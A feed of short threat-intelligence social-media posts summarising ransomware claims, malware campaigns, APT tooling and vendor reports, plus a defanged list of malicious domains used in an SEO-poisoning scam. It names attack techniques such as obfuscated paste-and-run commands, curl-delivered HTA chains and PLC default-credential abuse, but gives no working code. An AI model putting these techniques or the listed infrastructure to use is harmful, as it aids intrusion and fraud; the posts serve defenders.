CIRCLE WITH A DOT

Qilin claims ransomware attack on United States' Transgas Inc. Exfiltration of data reported. #Ransomware #Transportation #USA #ThreatIntel

I'm happy to announce the long-awaited first release of misp-modules-cli version 1.0.0. This initial release makes it nifty and convenient to use MISP expansion modules directly from the command line, whether you are working against a local or remote misp-modules service. The goal is simple: bring the power of misp-modules into a lightweight CLI workflow that is easy to script, automate, and integrate into daily analysis work.#misp #mispmodules #threatintelligence #threatintel #opensource #cli #cybersecurity #osint @misp Release note https://github.com/MISP/misp-modules-cli/releases/tag/v1.0 misp-modules-cli https://github.com/MISP/misp-modules-cli misp-modules https://github.com/MISP/misp-modules

(socket.dev) TeamPCP and Vect Ransomware Group Unite to Weaponize Open Source Supply Chain CompromisesTeamPCP partners with Vect RaaS to weaponize open-source supply chain compromises for ransomware ops. Targets include Trivy, LiteLLM, GitHub Actions, npm/PyPI packages, and Docker images. 300GB+ of CI/CD credentials exfiltrated, with LiteLLM breach yielding hundreds of thousands of tokens. Vect offers 80-88% affiliate revenue via BreachForums (300K+ users). Attack chain exploits trusted pipeline components for initial access and ransomware deployment.Source: https://socket.dev/blog/teampcp-partners-with-vect-targeting-oss-supply-chains#Cybersecurity #ThreatIntel

(safebreach.com) Iranian Cyber Operations: Escalating Threat Landscape, Expanded Targeting, and Evolving TTPsIranian cyber ops surge: 700% spike in attacks vs Israel, IRGC-affiliated CyberAv3ngers exploit Unitronics PLCs/HMIs (default creds, LOTL) in OT/ICS. No Justice wiper (e2531f) deployed via T1566/T1534. Cotton Sandstorm uses ASPX webshells, fake-ransomware; Pioneer Kitten abuses cloud for lateral movement. CISA advisories AA25-239A/AA25-343A highlight expanded targeting (DIB, water, energy). Hybrid state-criminal ransomware collab observed.Source: https://www.safebreach.com/blog/an-update-on-the-heightened-threat-of-iranian-cyber-attacks/#Cybersecurity #ThreatIntel

Seeing FQDNs like "mtmoqiuq.20.218.142.124.static.hostiran[.]name" and "sgrwnbid.172-202-98-170.cloud-xip[.]com", we first thought some ASNs could be exploited similarly to the ".ARPA abuse" we described in one of our recent blogs. Turns out we were overthinking it... This kind of "DNS abuse" is so straight forward... We're not sure it qualifies as DNS abuse...Here is what is going on: Whatever IP address you prepend to "static.hostiran[.]name" creates a hostname which resolves to this IP... That is it! Same goes for cloud-xip[.]com!We've seen these kinds of hostnames a lot in SPAM emails recently, like the one we screenshot below which loads an image from a CDN as a giant hyperlink. We aren't sure why malicious SPAM actors bother to use this trick in their email links... If they control an IP, they can use it directly in URLs. They don't need a domain name!? And it isn't like this bypasses a firewall... If their IP is blocked, queries to those FQDNs will be too...Our best guesses are that:- Using hostnames rather than IPs helps them bypass SPAM email detection?- And / or it enables them to create "subdomains", which they seem to be doing to track something, either SPAM campaigns, or their victims.Technically, this could be used to create lookalike FQDNs. Those examples look like random subdomains, but literally anything can be prepended to the IP, so the only limit is your imagination! Not the most convincing lookalike by any means... but we've seen worse!Here is an example of how this can be abused to both, load content from literally any IP, and create low quality lookalikes:https://urlscan.io/result/019d1b3d-b94e-70f9-aae7-ecf5a02e3c89/#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #spam #scam

New.Infoblox: No Reach, No Risk: The Keitaro Abuse in Modern Cybercrime Distribution https://www.infoblox.com/blog/threat-intelligence/no-reach-no-risk-the-keitaro-abuse-in-modern-cybercrime-distribution/ @InfobloxThreatIntel #infosec #threatintel #threatintelligence #scam

Cyble: The Energy Sector’s Ransomware Nightmare: Why Critical Infrastructure Can’t Catch a Break https://cyble.com/blog/energy-sector-ransomware-attack-report/ #infosec #ransomware #threatintel #threatintelligence

(infoblox.com) Keitaro Abuse Exposed: How Threat Actors Weaponize Commercial Adtech Across a Broad Spectrum of CybercrimeKeitaro TDS abuse drives surge in malvertising, cryptocurrency theft, and phishing. 20%+ of tracked threat actors (TilapiaParabens, HircusPircus, TheNovosti) exploit Keitaro for malware delivery (DonutLoader → StealC v2, RustyStealer), wallet drainers (96% of spam campaigns), and phishing. Bulletproof hosting AS214351 (FEMO IT) fronts C2s; JA4+ fingerprinting exposes admin consoles. RDGA, Sitting Ducks hijacking, and obfuscated JS enable evasion. Targets: Canadian banks, Brazilian PII, NFT scams.Source: https://www.infoblox.com/blog/threat-intelligence/no-reach-no-risk-the-keitaro-abuse-in-modern-cybercrime-distribution/#Cybersecurity #ThreatIntel

(redcanary.com) Scarlet Goldfinch Threat Actor Evolves Paste-and-Run Techniques Across Multiple Attack EpochsScarlet Goldfinch (SmartApeSG/ZPHP) evolves paste-and-run TTPs across 7 epochs, leveraging T1204.004 (Malicious Copy-Paste) for initial access. Recent campaigns use cmd.exe /v:on for delayed env var expansion, ^ escape obfuscation, and substring indexing. End-stage payloads remain NetSupport Manager (via Remcos), with StealC/ArechClient2 observed. DLL sideloading chain: curl-delivered HTA → AppData\Local staging → tar extraction → legitimate EXE abuse. Defenders: signature-based detection alone insufficient.Source: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/#Cybersecurity #ThreatIntel

GlassWorm update:• Solana dead drop C2 + DHT fallback• Fake Chrome extension → full browser exfil• HW wallet phishing (Ledger/Trezor)• HVNC + SOCKS modules• Targets npm, PyPI, MCPDecentralized infra = stealth persistence.Source: https://thehackernews.com/2026/03/glassworm-malware-uses-solana-dead.htmlFollow @technadu #InfoSec #ThreatIntel #Malware

(rapid7.com) Red Menshen: China-Nexus Threat Actor Deploys Evolved BPFdoor Implants as Telecom Backbone Sleeper CellsRed Menshen (China-nexus APT) deploys evolved BPFdoor Linux backdoor in global telecoms, targeting 4G/5G core signaling via SCTP. New variants use HTTPS-embedded 'magic ruler' triggers (9999 marker) and ICMP C2 (0xFFFFFFFF sentinel) for stealth lateral movement. RC4-MD5 encryption, process masquerading (hpasmlited, Docker), and kernel-level eBPF abuse enable persistent access. Initial access via Ivanti/Cisco/Fortinet/VMware/Palo Alto exploits. Enables IMSI harvesting and subscriber tracking.Source: https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report#Cybersecurity #ThreatIntel

Signal > noise.GreyNoise: 242K new IPs, 99.7% no TCP handshake.Real activity?UCLOUD +472%, multi-protocol scans.Are you validating sources?Source: https://www.greynoise.io/blog/ghost-fleet-half-new-scanning-ips-geolocated-to-hong-kongComment + follow TechNadu#Infosec #ThreatIntel #SOC

@FritzAdalis But in fairness, I aggregate them for the block lists. This is just because I was curious how many were in those prefixes total.

THREAT INTELLIGENCEFCC Bans New Foreign-Made Routers Over Supply Chain and Cyber Risk ConcernsVulnerability | MEDIUMThe Federal Communications Commission has updated its Covered List to include all consumer routers made in foreign countries, banning the sale of new...Full analysis:https://www.yazoul.net/news/news/fcc-bans-new-foreign-made-routers-over-supply-chain-and-cyber-risk-concerns#ThreatIntel #Malware #ThreatHunting

As the infosec community continues to grapple with the implications of AI-powered attacks like Claude, it's clear that our reliance on human ingenuity alone is no longer sufficient.Read more: https://steelefortress.com/55nexy#Security #Privacy #ThreatIntel

https://github.com/frenchfounder / hypercommit[.]com looks suspiciously like a supply chain attacker, trying to get around the fact that workflows are only disabled for first time contributors [1]Either this, or they're just spamming hundreds and hundreds of reposThey've no prior contributing history to anything, and all their profiles/etc are blank. One to watch out for given all the attacks against #github #repos at the moment#threatIntel #threatIntelligence #OSInt #hyperCommit[1] https://github.blog/changelog/2021-04-22-github-actions-maintainers-must-approve-first-time-contributor-workflow-runs/

RE: https://infosec.exchange/@deepfield/116284754769568339The operator built triple-layer crypto, fast-flux DNS across 30+ ASes, biweekly C2 rotation — then shipped an unstripped debug build on port 8090, a couple of ports over from production. 300+ symbols, project name, internal module names, all right there in readelf.Anyway here's the full writeup.https://github.com/deepfield/public-research/blob/main/jackskid/report.md#threatintel #ddos

Most Mirai forks are disposable. #Jackskid was built not to be.Joint research with Comcast Threat Research Labs — we tracked this botnet across 80+ samples and 13 build generations as it evolved from a bare-bones prototype into a dual-vector Android TV/IoT platform with triple-layer encryption and DNS-over-HTTPS C2.Report and IoCs: https://github.com/deepfield/public-research/blob/main/jackskid/report.md#threatintel #ddos

Dios mio! While researching a particular type of Colombian folk music, we stumbled across a .edu domain selling... accordions? Our first thought was potentially domain hijacking, but it appears to be more likely an exploitation of CVE-2026-27210 (TLDR; cross-site scripting). While the vulnerability has been patched in the plugin itself, not all pages have updated their plugins, and search engines have already indexed the poisoned pages! Pivoting led to 50+ additional domains found spread across three risky TLDs: .sbs, .pics, and .shop. The domains on .sbs and .pics appear to be config servers to exploit the vulnerability; the domains on .shop are the landing pages where victims can be scammed.IOCs:000o[.]sbs,0pen[.]sbs,123buys[.]shop,123me[.]shop,1bg[.]pics,1ki[.]pics,1mage[.]sbs,1ql[.]pics,1ty[.]pics,1vi[.]pics,1wr[.]pics,2ty[.]pics,569oagri[.]shop,66buys[.]shop,6ip[.]pics,6ym[.]pics,7rt[.]pics,8pi[.]pics,99buys[.]shop,99i[.]pics,9gwe[.]shop,a25n[.]shop,bk2[.]pics,bk59t[.]shop,buysok[.]shop,c68k[.]shop,cc1[.]pics,doo[.]pics,ep7[.]pics,estore-1[.]com,g9gvv[.]sbs,gaer896[.]shop,gm5[.]pics,gosok[.]shop,gt3[.]pics,h66p[.]shop,hh6[.]pics,iilvw[.]sbs,im9[.]pics,img1[.]sbs,in6[.]pics,jj3[.]pics,kk9[.]pics,lilil[.]sbs,llvvw[.]sbs,m66p6[.]shop,mebuys[.]shop,mg6[.]pics,mh8f6k[.]shop,mkk[.]pics,ms1[.]pics,nn6[.]pics,onsgs[.]com,p6[.]pics,p888p[.]shop,pan1[.]top,pic1[.]sbs,pic2[.]sbs,pt11[.]sbs,py3y[.]com,qq1[.]pics,rey89p[.]shop,shop56[.]shop,t88t8[.]shop,tp1[.]pics,tp9[.]pics,trues[.]sbs,up9[.]pics,upimg[.]sbs,uu2[.]pics,vt5[.]pics,vteyu[.]shop,vvf1[.]sbs,vvp1[.]sbs,w2w[.]pics,w88p[.]shop,wp59q[.]shop,wvlll[.]sbs,wvv1[.]sbs,wvvvv[.]sbs,x2p[.]pics,xyaer548[.]shop,yi1[.]pics#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #seo_poisoning #seopoisoning

Writing this from San Diego — about as far from my Swiss desk as a timezone can stretch. But the news didn't care about my travel schedule.If there's one thread running through this week, it's Iran: Boggy Serpens refining its AI-enhanced espionage playbook, an attempted intrusion at Poland's nuclear research center with Iranian fingerprints, the EU hitting Iranian entities with fresh sanctions — and Iran's own population cut off from the internet for over two weeks now. Stryker is still cleaning up from last week's Handala attack too. A lot of activity from a lot of pro-Iran actors in one week.→ Week #12/2026 also covers: 🪱 GlassWorm escalates its supply chain campaign, ️ EU votes to ban mass message scanning, A witness blamed ChatGPT for his smartglassesFull issue https://infosec-mashup.santolaria.net/p/infosec-mashup-12-2026-iran-is-everywhere-this-weekIf you find it useful, subscribe to get it in your inbox every weekend #infosecMASHUP #cybersecurity #infosec #threatintel